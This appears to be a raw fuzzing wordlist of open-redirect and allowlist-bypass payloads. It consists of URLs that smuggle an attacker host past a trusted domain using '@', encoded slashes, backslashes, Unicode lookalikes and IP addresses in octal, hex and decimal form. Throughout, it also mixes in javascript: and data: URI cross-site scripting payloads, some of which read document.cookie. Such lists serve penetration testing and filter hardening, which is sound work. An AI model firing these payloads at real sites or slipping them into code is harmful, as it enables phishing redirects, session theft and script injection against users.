http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
http://www.whitelisteddomain.tld@00330.0x3a.54990
http:www.whitelisteddomain.tld@00330.0x3a.54990
http://www.whitelisteddomain.tld@00330.3856078
http:www.whitelisteddomain.tld@00330.3856078
http://www.whitelisteddomain.tld@0330.072.0326.0316
http:www.whitelisteddomain.tld@0330.072.0326.0316
http://www.whitelisteddomain.tld@0xd8.072.54990
http:www.whitelisteddomain.tld@0xd8.072.54990
http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http://www.whitelisteddomain.tld@0xd8.3856078
http:www.whitelisteddomain.tld@0xd8.3856078
http://www.whitelisteddomain.tld@0xd83ad6ce
http:www.whitelisteddomain.tld@0xd83ad6ce
http://www.whitelisteddomain.tld@[::216.58.214.206]
http:www.whitelisteddomain.tld@[::216.58.214.206]
http://www.whitelisteddomain.tld%2eⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://www.whitelisteddomain.tld%2egoogle.com/
http://www.whitelisteddomain.tld@3627734734
http:www.whitelisteddomain.tld@3627734734
http://www.whitelisteddomain.tld@472.314.470.462
http:www.whitelisteddomain.tld@472.314.470.462
http://www.whitelisteddomain.tld:80%40Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://www.whitelisteddomain.tld:80%40google.com/
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http://www.whitelisteddomain.tld@google.com/
http://www.whitelisteddomain.tld+&@google.com#+@www.whitelisteddomain.tld/
http://www.whitelisteddomain.tld+&@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@www.whitelisteddomain.tld/
http://www.google.com\.www.whitelisteddomain.tld
http://www.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\.www.whitelisteddomain.tld
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http://XY>.7d8T\205pZM@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http://XY>.7d8T\205pZM@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http://XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http://XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\205pZM@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@google.com/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@google.com/
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
Javas%26%2399;ript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://www.whitelisteddomain.tld/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//
javascript://www.whitelisteddomain.tld?%a0alert%281%29
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twww.whitelisteddomain.tld/
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@www.whitelisteddomain.tld
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
www.whitelisteddomain.tld;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/\www.whitelisteddomain.tld:80%40google.com
www.whitelisteddomain.tld@%E2%80%AE@google.com
////www.whitelisteddomain.tld@google.com//
////www.whitelisteddomain.tld@google.com/
///www.whitelisteddomain.tld@google.com//
///www.whitelisteddomain.tld@google.com/
//www.whitelisteddomain.tld@google.com//
//www.whitelisteddomain.tld@google.com/
www.whitelisteddomain.tld;@google.com
www.whitelisteddomain.tld.google.com
////www.whitelisteddomain.tld@google.com/%2e%2e
///www.whitelisteddomain.tld@google.com/%2e%2e
////www.whitelisteddomain.tld@google.com/%2e%2e%2f
///www.whitelisteddomain.tld@google.com/%2e%2e%2f
//www.whitelisteddomain.tld@google.com/%2e%2e%2f
////www.whitelisteddomain.tld@google.com/%2f..
///www.whitelisteddomain.tld@google.com/%2f..
//www.whitelisteddomain.tld@google.com/%2f..
////www.whitelisteddomain.tld@google.com/%2f%2e%2e
///www.whitelisteddomain.tld@google.com/%2f%2e%2e
//www.whitelisteddomain.tld@google.com/%2f%2e%2e
//www.whitelisteddomain.tld+&@google.com#+@www.whitelisteddomain.tld/
//www.whitelisteddomain.tld@https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
//www.whitelisteddomain.tld@https:///google.com/%2e%2e
//www.whitelisteddomain.tld+&@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#+@www.whitelisteddomain.tld/
/x:1/:///%01javascript:alert(document.cookie)/
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
//XY>.7d8T\205pZM@www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld@google.com/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld+@google.com/
//localdomain.pw/%2f..
//www.whitelisteddomain.tld@localdomain.pw/%2f..
///localdomain.pw/%2f..
///www.whitelisteddomain.tld@localdomain.pw/%2f..
////localdomain.pw/%2f..
////www.whitelisteddomain.tld@localdomain.pw/%2f..
https://localdomain.pw/%2f..
https://www.whitelisteddomain.tld@localdomain.pw/%2f..
/https://localdomain.pw/%2f..
/https://www.whitelisteddomain.tld@localdomain.pw/%2f..
//localdomain.pw/%2f%2e%2e
//www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
///localdomain.pw/%2f%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
////localdomain.pw/%2f%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
https://localdomain.pw/%2f%2e%2e
https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
//localdomain.pw/
//www.whitelisteddomain.tld@localdomain.pw/
///localdomain.pw/
///www.whitelisteddomain.tld@localdomain.pw/
////localdomain.pw/
////www.whitelisteddomain.tld@localdomain.pw/
https://localdomain.pw/
https://www.whitelisteddomain.tld@localdomain.pw/
/https://localdomain.pw/
/https://www.whitelisteddomain.tld@localdomain.pw/
//localdomain.pw//
//www.whitelisteddomain.tld@localdomain.pw//
///localdomain.pw//
///www.whitelisteddomain.tld@localdomain.pw//
////localdomain.pw//
////www.whitelisteddomain.tld@localdomain.pw//
https://localdomain.pw//
https://www.whitelisteddomain.tld@localdomain.pw//
//https://localdomain.pw//
//https://www.whitelisteddomain.tld@localdomain.pw//
//localdomain.pw/%2e%2e%2f
//www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
///localdomain.pw/%2e%2e%2f
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
////localdomain.pw/%2e%2e%2f
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
https://localdomain.pw/%2e%2e%2f
https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
//https://localdomain.pw/%2e%2e%2f
//https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
///localdomain.pw/%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
////localdomain.pw/%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e
https:///localdomain.pw/%2e%2e
https:///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
//https:///localdomain.pw/%2e%2e
//www.whitelisteddomain.tld@https:///localdomain.pw/%2e%2e
/https://localdomain.pw/%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e
///localdomain.pw/%2f%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
////localdomain.pw/%2f%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
https:///localdomain.pw/%2f%2e%2e
https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
/https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/https:///localdomain.pw/%2f%2e%2e
/https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
/%09/localdomain.pw
/%09/www.whitelisteddomain.tld@localdomain.pw
//%09/localdomain.pw
//%09/www.whitelisteddomain.tld@localdomain.pw
///%09/localdomain.pw
///%09/www.whitelisteddomain.tld@localdomain.pw
////%09/localdomain.pw
////%09/www.whitelisteddomain.tld@localdomain.pw
https://%09/localdomain.pw
https://%09/www.whitelisteddomain.tld@localdomain.pw
/%5clocaldomain.pw
/%5cwww.whitelisteddomain.tld@localdomain.pw
//%5clocaldomain.pw
//%5cwww.whitelisteddomain.tld@localdomain.pw
///%5clocaldomain.pw
///%5cwww.whitelisteddomain.tld@localdomain.pw
////%5clocaldomain.pw
////%5cwww.whitelisteddomain.tld@localdomain.pw
https://%5clocaldomain.pw
https://%5cwww.whitelisteddomain.tld@localdomain.pw
/https://%5clocaldomain.pw
/https://%5cwww.whitelisteddomain.tld@localdomain.pw
https://localdomain.pw
https://www.whitelisteddomain.tld@localdomain.pw
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
javascript:%0aalert`1`
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//localdomain.pw
http:localdomain.pw
https:localdomain.pw
//localdomain%E3%80%82pw
\/\/localdomain.pw/
/\/localdomain.pw/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
//\/localdomain.pw/
//localdomain%00.pw
https://www.whitelisteddomain.tld/https://localdomain.pw/
";alert(0);//
javascript://www.whitelisteddomain.tld?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://0xd83ad6ce
http://www.whitelisteddomain.tld@0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://www.whitelisteddomain.tld@3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://www.whitelisteddomain.tld@472.314.470.462
http://3H6k7lIAiqjfNeN@472.314.470.462
http://XY>.7d8T\205pZM@472.314.470.462
http://0330.072.0326.0316
http://www.whitelisteddomain.tld@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://00330.00072.0000326.00000316
http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://[::216.58.214.206]
http://www.whitelisteddomain.tld@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://www.whitelisteddomain.tld@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.072.54990
http://0xd8.3856078
http://www.whitelisteddomain.tld@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://XY>.7d8T\205pZM@0xd8.3856078
http://00330.3856078
http://www.whitelisteddomain.tld@00330.3856078
http://3H6k7lIAiqjfNeN@00330.3856078
http://XY>.7d8T\205pZM@00330.3856078
http://00330.0x3a.54990
http://www.whitelisteddomain.tld@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:www.whitelisteddomain.tld@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:www.whitelisteddomain.tld@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:www.whitelisteddomain.tld@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http:0330.072.0326.0316
http:www.whitelisteddomain.tld@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:00330.00072.0000326.00000316
http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:[::216.58.214.206]
http:www.whitelisteddomain.tld@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:www.whitelisteddomain.tld@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http:0xd8.3856078
http:www.whitelisteddomain.tld@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http:00330.3856078
http:www.whitelisteddomain.tld@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http:00330.0x3a.54990
http:www.whitelisteddomain.tld@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
〱localdomain.pw
〵localdomain.pw
ゝlocaldomain.pw
ーlocaldomain.pw
ーlocaldomain.pw
/〱localdomain.pw
/〵localdomain.pw
/ゝlocaldomain.pw
/ーlocaldomain.pw
/ーlocaldomain.pw
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
<>javascript:alert(1);
<>//localdomain.pw
//localdomain.pw\@www.whitelisteddomain.tld
https://:@localdomain.pw\@www.whitelisteddomain.tld
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://localdomain.pw:80#@www.whitelisteddomain.tld/
http://localdomain.pw:80?@www.whitelisteddomain.tld/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld⁺@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld⁺@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
http://www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
http://www.whitelisteddomain.tld⁺&@localdomain.pw#⁺@www.whitelisteddomain.tld/
http://localdomain.pw\twww.whitelisteddomain.tld/
//localdomain.pw:80#@www.whitelisteddomain.tld/
//localdomain.pw:80?@www.whitelisteddomain.tld/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld⁺@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld⁺@localdomain.pw/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
//www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
//www.whitelisteddomain.tld⁺&@localdomain.pw#⁺@www.whitelisteddomain.tld/
//localdomain.pw\twww.whitelisteddomain.tld/
//;@localdomain.pw
//﹔@localdomain.pw
http://;@localdomain.pw
http://﹔@localdomain.pw
@localdomain.pw
javascript://https://www.whitelisteddomain.tld/?z=%0Aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/
http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/
http://localdomain.pw%3F.www.whitelisteddomain.tld/
http://localdomain.pw%23.www.whitelisteddomain.tld/
http://www.whitelisteddomain.tld:80%40localdomain.pw/
http://www.whitelisteddomain.tld%2elocaldomain.pw/
/x:1/:///%01javascript:alert(document.cookie)/
/https:/%5clocaldomain.pw/
https:/%5clocaldomain.pw/
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascripT://www.whitelisteddomain.tld/%250d%250aalert(document.cookie)
/http://localdomain.pw
/%2f%2flocaldomain.pw
//%2f%2flocaldomain.pw
/localdomain.pw/%2f%2e%2e
/http:/localdomain.pw
http:/localdomain.pw
/.localdomain.pw
http://.localdomain.pw
.localdomain.pw
///\;@localdomain.pw
///\﹔@localdomain.pw
///localdomain.pw
/////localdomain.pw/
/////localdomain.pw
ja	vascript:alert(1)
ja
vascript:alert(1)
ja
vascript:alert(1)
javascript:alert()
javascript:alert()
javascript:alert()
javascript:alert(1)
javascript:alert()
javascript:alert()
javascript:alert``
javascript:alert%60%60
javascript:x='%27-alert(1)-%27';
javascript:%61%6c%65%72%74%28%29
javascript:a\u006Cert``"
javascript:\u0061\u006C\u0065\u0072\u0074``
java%0ascript:alert(1)
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(1)
java%09script:alert(1)
java%0dscript:alert(1)
javascript://%0aalert(1)
javascript://%0aalert`1`
Javas%26%2399;ript:alert(1)
data:www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//
http://www.localdomain.pw\.www.whitelisteddomain.tld
%19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529
%01https://localdomain.pw
www.whitelisteddomain.tld;@localdomain.pw
www.whitelisteddomain.tld﹔@localdomain.pw
https://www.whitelisteddomain.tld;@localdomain.pw
https://www.whitelisteddomain.tld﹔@localdomain.pw
http:%0a%0dlocaldomain.pw
https://%0a%0dlocaldomain.pw
localdomain.pw/www.whitelisteddomain.tld
https://localdomain.pw/www.whitelisteddomain.tld
//localdomain.pw/www.whitelisteddomain.tld
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
/https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
/https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
//https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
//https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
//Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
//www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
